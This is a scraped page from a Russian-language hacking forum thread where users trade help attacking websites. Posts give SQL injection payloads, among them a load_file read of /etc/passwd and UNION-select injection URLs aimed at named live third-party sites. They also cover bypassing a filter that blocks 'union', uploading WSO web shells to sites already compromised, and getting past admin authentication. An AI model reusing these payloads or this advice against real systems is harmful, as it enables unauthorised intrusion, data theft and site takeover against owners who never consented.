Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,654
    Likes Received:
    173
    Reputations:
    75
    не, никакие насройки в параметрах некатят, а как мне занесли данные в таблицу?
    попробовал так
    PHP:
    insert into `db.a` (`text`) VALUES ('(select load_file('/etc/passwd'))')
    выдпло ошибку, как правельние?
     
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    убери кавычки, у тебя стринг получается, а не выполняющаяся функция

    ((select load_file('/etc/passwd'))
     
    _________________________
    #20222 Konqi, 21 Apr 2012
    Last edited: 21 Apr 2012
    4 people like this.
  3. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    45
    Likes Received:
    0
    Reputations:
    0
    нет походу просто я неправильно пользуюсь тем примером.Вот я а локалхосте пробую пользоваться,и ввожу как в том примере
    http://localhost/erase.php?id=-2+union+select+0x2D3220756E696F6E2073656C6563742027393939272C3131312F2A,2,3/* поидее как там пишется должно вывести 2:3
    999:111 но выводит -2 union select '999',111/* вот такие дела :(
     
  4. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    393
    Likes Received:
    130
    Reputations:
    54
    Ни как не могу разобраться с rewrite mode. Залил шелл на сайт. При обращении на /store/checkout/payment_info/xxxxxxxx, где xxxxxxxx уникальный ID, выводится определенная инфа. Все перекопал, но не могу найти тот скрипт на шелле, который обрабатывает ID и выводит инфу. Сервак очень большой, с реврайтом очень плохо знаком. Как можно узнать?
     
  5. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    45
    Likes Received:
    0
    Reputations:
    0
    как узнать полный путь к корню сайта,если в ошибках его нету?
     
  6. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    45
    Likes Received:
    0
    Reputations:
    0
    Помогите не могу залить шелл на сайт,хочу залить WSO уже залил файл для закачки шелла,заливаю шелл,перехожу на страницу с шелом,а там показан код шелла,и страница ещё не успев полностью загрзиться,закрывается,и перебрасвает меня на страницу с ошибкой,где написанно,что подключение закрыто удаленным сервером.
     
  7. Groove

    Groove Member

    Joined:
    13 Nov 2010
    Messages:
    168
    Likes Received:
    20
    Reputations:
    2
    Срочно нужен shell для sql возможности (Изменить , сохранить , удалить ) Киньте ссылку плиз .
     
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,279
    Likes Received:
    1,148
    Reputations:
    886
    а сам не пробовал искать?

    шелл на php тык
     
    _________________________
  9. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    428
    Likes Received:
    48
    Reputations:
    11
    он наверно не про это имел ввиду,а про то чтобы не запросом всё это делать а просто нажал изменить,сохранить.
    не видел я правда ещё таких шеллов,но можешь небольшой скрипт закинуть и использовать называется так MySQL RST/GHC Manager(весит гдето 100 kb)
     
  10. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    857
    Likes Received:
    171
    Reputations:
    84
    Имел кто дело с SFTcms v 2.0?
    Картинки заливаются, но куда, черт ногу сломит =/
     
  11. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    742
    Likes Received:
    73
    Reputations:
    19
    Качай исходники смотри что куда, но 60% что в БД ищи другие пути.
     
    1 person likes this.
  12. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    857
    Likes Received:
    171
    Reputations:
    84
    бло, исходники нагуглить не могу... Мб есть у кого?
     
  13. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    857
    Likes Received:
    171
    Reputations:
    84
    Как крутить без еррорбазед?
     
  14. Ereee

    Ereee Reservists Of Antichat

    Joined:
    1 Dec 2011
    Messages:
    602
    Likes Received:
    373
    Reputations:
    267
    Всмысле как?
    Code:
    http://www.si-ultra.biz/catalog/seria.php?k=12-9999.9+union+select+1,version(),3--+f
    Тайтл смотри :D
     
    1 person likes this.
  15. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    857
    Likes Received:
    171
    Reputations:
    84
    Сенк! А если в тайтле вывода бы не было?
     
  16. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    857
    Likes Received:
    171
    Reputations:
    84
    wtf?
     
  17. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    824
    Likes Received:
    350
    Reputations:
    120
    http://www.nashpereviznuk.net/print.php?r=news&new=-4664+union+select+1,version(),3,4,5,6,7,8,9,10,11--+
    wtf?
    wtf?
     
    3 people like this.
  18. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    112
    Likes Received:
    97
    Reputations:
    21
    Хелп ми )) фильтруется union, что можно сделать?
    Пробовал:
    -разным регистром написать
    -/*!UnIoN*/
    при нахождении union в запросе выдает The requested URL was not found on this server.
     
  19. t3cHn0iD

    t3cHn0iD Banned

    Joined:
    6 Apr 2009
    Messages:
    323
    Likes Received:
    63
    Reputations:
    66
    https://rdot.org/forum/showthread.php?t=60
     
  20. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    172
    Likes Received:
    1
    Reputations:
    -10
    Нашел скулю в пост запросе. Помогли её раскрутить. Но такая проблема, в роботс прописано вот что:
    Code:
    User-agent: *
    Crawl-delay: 5 #
    Disallow: /admin/
    Disallow: /administrator/
    Disallow: /cache/
    Disallow: /components/
    Disallow: /includes/
    Disallow: /installation/
    Disallow: /language/
    Disallow: /libraries/
    Disallow: /logs/
    Disallow: /media/
    Disallow: /modules/
    Disallow: /plugins/
    Disallow: /templates/
    Disallow: /tmp/
    Disallow: /xmlrpc/
    Disallow: /search/?s*
    
    при переходе на /admin вылезает бейсик авторизация, лог пас пара не верная. Что делать?
     
Loading...
Thread Status:
Not open for further replies.